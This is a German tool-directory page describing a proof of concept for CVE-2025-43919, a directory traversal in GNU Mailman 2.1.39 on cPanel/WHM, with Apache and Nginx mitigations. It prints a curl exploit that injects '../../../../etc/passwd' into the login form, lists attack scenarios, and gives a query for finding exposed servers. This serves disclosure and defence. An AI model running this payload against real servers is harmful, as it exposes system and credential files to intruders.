Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-43919-POC — In GNU Mailman 2.1.39, das mit cPanel/WHM gebündelt ist, wurde eine neue Schwachstelle entdeckt, die es nicht authentifizierten Remote-Angreifern ermöglicht, über einen Directory-Traversal-Fehler beliebige Dateien auf dem Server zu lesen. | Kitploit
Tools/GitHubGitHub/cybersecplayground/cve-2025-43919-poc
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubcybersecplayground/cve-2025-43919-poc

CVE-2025-43919-POC

In GNU Mailman 2.1.39, das mit cPanel/WHM gebündelt ist, wurde eine neue Schwachstelle entdeckt, die es nicht authentifizierten Remote-Angreifern ermöglicht, über einen Directory-Traversal-Fehler beliebige Dateien auf dem Server zu lesen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
111vor 1 JahrNoch nicht geprüft

🚨 CVE-2025-43919: Verzeichnis-Traversal in GNU Mailman 2.1.39 (cPanel/WHM)

In GNU Mailman 2.1.39, das mit cPanel/WHM gebündelt ist, wurde eine neue Schwachstelle entdeckt, die es nicht authentifizierten Remote-Angreifern ermöglicht, über einen Verzeichnis-Traversal-Fehler beliebige Dateien auf dem Server zu lesen.

📌 Zusammenfassung der Schwachstelle:

  • Typ: Directory Traversal (nicht authentifiziert)
  • Komponente: private.py CGI-Skript
  • Betroffener Endpunkt: /mailman/private/mailman
  • Auswirkung: Offenlegung von Dateien wie /etc/passwd, .mbox archives und Mailman configs
  • CVSS-Score: 5.8 (Medium)
  • CVE-ID: CVE-2025-43919

Status: Kein offizieller Patch (Mailman 2.1.x ist EOL)

🔥 Proof of Concept:

root@kitploit:~
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman

🧨 Angriffsszenarien:

  • /etc/passwd, configs oder mailbox files auslesen
  • Anmeldedaten und sensible Archive offenlegen
  • Mit anderen Schwachstellen für RCE oder Rechteausweitung verketten

🛡️ Gegenmaßnahmen: Zugriff auf /mailman/private auf Webserver-Ebene blockieren:

root@kitploit:~
<Location "/mailman/private">
    Require ip 127.0.0.1
    Deny from all
</Location>

Oder in Nginx:

root@kitploit:~
location /mailman/private {
    deny all;
    return 403;
}

⬆️ Migration auf Mailman 3.x — 2.x ist EOL und verfügt nicht über moderne Schutzmechanismen

🔍 FOFA-Abfrage : app="Mailman"

📚 Informieren Sie sich, teilen Sie verantwortungsbewusst und halten Sie Ihre Infrastruktur sicher.

🔒 Folgen Sie für weitere reale CVEs, PoCs und Hardening-Tipps: 👉 @cybersecplayground

#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity

Tool herunterladen